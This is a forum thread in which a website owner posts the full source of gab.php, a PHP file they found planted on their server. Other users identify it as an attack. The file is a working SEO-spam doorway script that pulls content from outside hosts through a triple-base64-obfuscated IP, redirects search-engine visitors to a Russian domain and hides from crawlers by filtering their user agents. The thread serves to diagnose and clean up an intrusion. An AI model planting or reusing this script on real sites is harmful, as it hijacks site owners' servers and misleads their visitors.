Weird file showing up on my website - gab.php

[DT4K]

Anyone know what gab.php is?
I was just looking at my site traffic and noticed there are a lot of hits to a file called gab.php. I see the file in my directory, but I have no idea what it is. I know I didn't put it there.
If I navigate to it in IE, I just get text that says "PASSED".

I would think maybe it's something my host company put in place, but the fact that there is a variable in it with a russian domain makes me wonder.

Here are the contents of the file. Anyone know anything about this?

<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort();    

$domain = "s4gvhd35.ru";
$main_nishe = "weather";

$ref = $_SERVER['HTTP_REFERER']; $host = $_SERVER["HTTP_HOST"]; $content_num = 100; $content_num_p = 100; $dhost = $_SERVER['HTTP_HOST'];

$dirbi = "blog";
if(!is_dir($dirbi)){
@mkdir($dirbi);
@chmod($dirbi, 0777);
}

if(!file_exists("logs2.txt")){ 
    $nish_f = $main_nishe."-".rand(0,9); 
    $url = explode("\n",GetPage("http://".returnIT()."/grab/wnish/".$nish_f.".txt"));
    shuffle($url);
    $fwr = ''; 
    for($i=0;$i<1000;$i++){ 
        $kkw = ltrim(rtrim(trim($url[$i])));
        if(strpos($kkw, "'")===false) $fwr .= $kkw."\n"; 
    }

    $fp = fopen("logs2.txt","w"); fwrite($fp, $fwr); fclose($fp); 
}

if(!file_exists("logs3.txt")){ 
    $url = explode("\n",GetPage("http://".returnIT()."/grab/wnish/c".$main_nishe.".txt"));
    shuffle($url);
    $fwr = ''; 
    for($i=0;$i<50;$i++){ 
        $fwr .= ltrim(rtrim(trim($url[$i])))."\n"; 
    }

    $fp = fopen("logs3.txt","w"); fwrite($fp, $fwr); fclose($fp); 
}


if(IsRefSE()==true&&IsBot()==false) {header("Location: http://".$domain."/liq/"."?st=".($_SERVER['HTTP_HOST']));exit;}
$ex = explode("=",$_SERVER['QUERY_STRING']); $var = $ex[0]; $query = str_replace("-"," ",$_GET[$var]);
$furl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']."?".$var."=";

if(!$_GET[$var]) exit("PASSED");
    $xmlUrl = $dirbi."/".md5($_GET[$var]).".txt"; 

$xmlStr = file_get_contents($xmlUrl); $query_d = str_replace(" ","-",$query); $arrXml[$query_d] = untag($xmlStr, $query_d);

if(!$arrXml[$query_d]){ 
if(!file_exists("logs1.txt")){
    $getTPL = GetPage("http://yourutils.info/nish/?".$dhost);
    $fp = fopen("logs1.txt", "w");
    fwrite($fp, $getTPL);
    fclose($fp);
} 
$kwd = file("logs2.txt"); 
if(str_word_count($query) <= 2){
///// category ----
$content = ''; $pagetitle = ucwords($query); $Get = GetContent($query,$content_num); shuffle($Get); 
// act url
shuffle($kwd); $i = 0; foreach($Get as $k=>$value){ $content .= "<a href=\"".$furl.str_replace(" ","-",trim($kwd[$i]))."\"><b>".trim($kwd[$i])."</b></a><br />\n".$value."<br /><br />\n\n"; 
$i++;
}
///// --- category ----
} else {
///// page ----
// ============
$content = ''; $pagetitle = ucwords($query); $Get = GetContent($query,$content_num); shuffle($Get); 
// act url
shuffle($kwd); $i = 0; foreach($Get as $k=>$value){ 
    if(rand(1,3)==3) $content .= "<a href=\"".$furl.str_replace(" ","-",trim($kwd[$i]))."\"><b>".trim($kwd[$i])."</b></a>";
    else $content .= "<b>".trim($kwd[$i])."</b>";

    $content .= "<br />\n".$value."<br /><br />\n\n"; 
$i++;
}
///// page ----
}

$tpl = file_get_contents("logs1.txt"); $outl = str_replace("\$pagetitle", $pagetitle, $tpl);$outl = str_replace("\$content", $content, $outl); $write = $outl;
$write = htmlspecialchars($write);  $fp = fopen($xmlUrl,"a+");  fwrite($fp, "<".$query_d.">\n".$write."\n</".$query_d.">\n");  fclose($fp); 
$write = htmlspecialchars_decode($write); 

} else {  

$write = htmlspecialchars_decode($arrXml[$query_d]); 

} 

print clean(stripslashes($write)); 

function clean($str){
    $str = str_replace("\\", "", $str);
    $str = str_replace("\\", "", $str);
    return $str;
}

function GetContent($q,$num){ $q=trim(strtolower($q)); 
$url="http://www.google.com/search?hl=en&safe=off&client=opera&hs=moz&rls=en&q=".urlencode($q)."&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=lang_en&aq=f&aqi=&aql=&oq=&gs_rfai=&num=".$num; 
$content=GetPage($url); preg_match_all("#<div class=\"s\">(.*)<cite>#U", $content, $result_preg); $result=$result_preg[1]; for ($i=0; $i<count($result); $i++) { $snippet=trim($result[$i]); 
$snippet=strip_tags($snippet,array('<em>','<b>')); $snippet=str_replace('em>','b>',$snippet); if (strpos($snippet,'File Format')==false) if (strpos($snippet,'http://')==false) { 
$snippet=str_replace("...","",$snippet); if (trim($snippet)) $snippets[]=$snippet; } } return $snippets;} function GetPage($url){ $url=str_replace("http://", "", $url); 
$host=substr($url,0,strpos($url,"/")); $path=substr($url,strpos($url,"/")); $skt = @fsockopen($host, 80); if (!$skt) return false; $requestHeader = "GET ".$path."  HTTP/1.1\r\n"; 
$requestHeader.= "Host: ".$host."\r\n"; $requestHeader.= "Connection: close\r\n\r\n"; fwrite($skt, $requestHeader); $responseHeader = ""; $responseContent = ""; do { $responseHeader.= 
fread($skt, 1); } while (!preg_match("/\\r\\n\\r\\n$/", $responseHeader)); if (!strstr($responseHeader, "Transfer-Encoding: chunked")){ while (!feof($skt)) { $responseContent.= fgets($skt, 
128); } } else { while ($chunk_length = hexdec(fgets($skt))) { $responseContentChunk = ""; $read_length = 0; while ($read_length < $chunk_length){ $responseContentChunk .= fread($skt, 
$chunk_length - $read_length); $read_length = strlen($responseContentChunk); } $responseContent.= $responseContentChunk; fgets($skt); } } return chop($responseContent); } function 
untag($string, $tag) { $ex = explode("<".$tag.">",$string); $last = explode("</".$tag.">",$ex[1]); return $last[0]; } function IsBot(){$stop_agents_masks = array("http", "google", "slurp", 
"msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress"); $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent\:[\s ]?|i", "", 
@$_SERVER["HTTP_USER_AGENT"]); foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", @$_SERVER['REMOTE_ADDR'])) return true; 
if(substr_count($_SERVER['HTTP_REFERER'],$_SERVER['HTTP_HOST'])!=0) return true; if(substr_count($_SERVER['HTTP_REFERER'],'/cse?')!=0) return true; 
if(substr_count($_SERVER['HTTP_REFERER'],"&")<3)return true; if($_SERVER["HTTP_USER_AGENT"]=="Mozilla/4.0 (compatible;)")return true; if(($_SERVER['HTTP_REFERER']=='') && 
($_SERVER["HTTP_USER_AGENT"]=="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)")) return true; return false; } function IsRefSE() { global $ref; if(substr_count($ref,"&")>2) return true; 
else return false; } function returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){ return base64_decode(base64_decode(base64_decode($default))); }
?>

 

[CycloWizard]

$domain = "s4gvhd35.ru";

What else do you need to know? Looks like some Russians decided to give you a file. 😛

 

[Ka0t1x]

what is the file printing to screen? It looks like its querying sites and making a log of it.

 

[Markbnj]

I'm with CycloWizard, you really don't need much more than what you have to know it's trouble. If your ISP is inserting scripts that reference Russian domains then I think it is on them to let you know. Otherwise you have to assume it's an attack. If it's a typical site attack that file will be far from the only mischief done, so I would either rebuild or restore from the last good backup. I recently went through this on my Wordpress site because the ISP left the front door open, and the bastards had hooks all over the place in different scripts. It was a pain in the ass.

 

[Cogman]

As mark has said, your in trouble. This looks very suspicious. My guess is that your ISP has been compromised.

This right here

"returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){ return base64_decode(base64_decode(base64_decode($default)));"

Looks VERY suspicious. They have a special string that is encoded using base64.. Twice. Plus a lot of code that attempts to intercept spiders and fool them into thinking the site is valid (IE, avoid the "malicious webpage" warning you get from google and mozilla.)

 

[GeneralS]

"returnIT($default = "VFZSbk5FeHFZM2xNYWtsM1RWTTBlRTFVVlQwPQ=="){ return base64_decode(base64_decode(base64_decode($default)));"

== '188.72.201.115' in case anybody's wondering 🙂

 

[uclabachelor]

Anyone know what gab.php is?
I was just looking at my site traffic and noticed there are a lot of hits to a file called gab.php. I see the file in my directory, but I have no idea what it is. I know I didn't put it there.
If I navigate to it in IE, I just get text that says "PASSED".

I would think maybe it's something my host company put in place, but the fact that there is a variable in it with a russian domain makes me wonder.

Here are the contents of the file. Anyone know anything about this?

<?php
error_reporting(0);
set_time_limit(0);
ignore_user_abort();    

$domain = "s4gvhd35.ru";

I stopped looking at the source code there.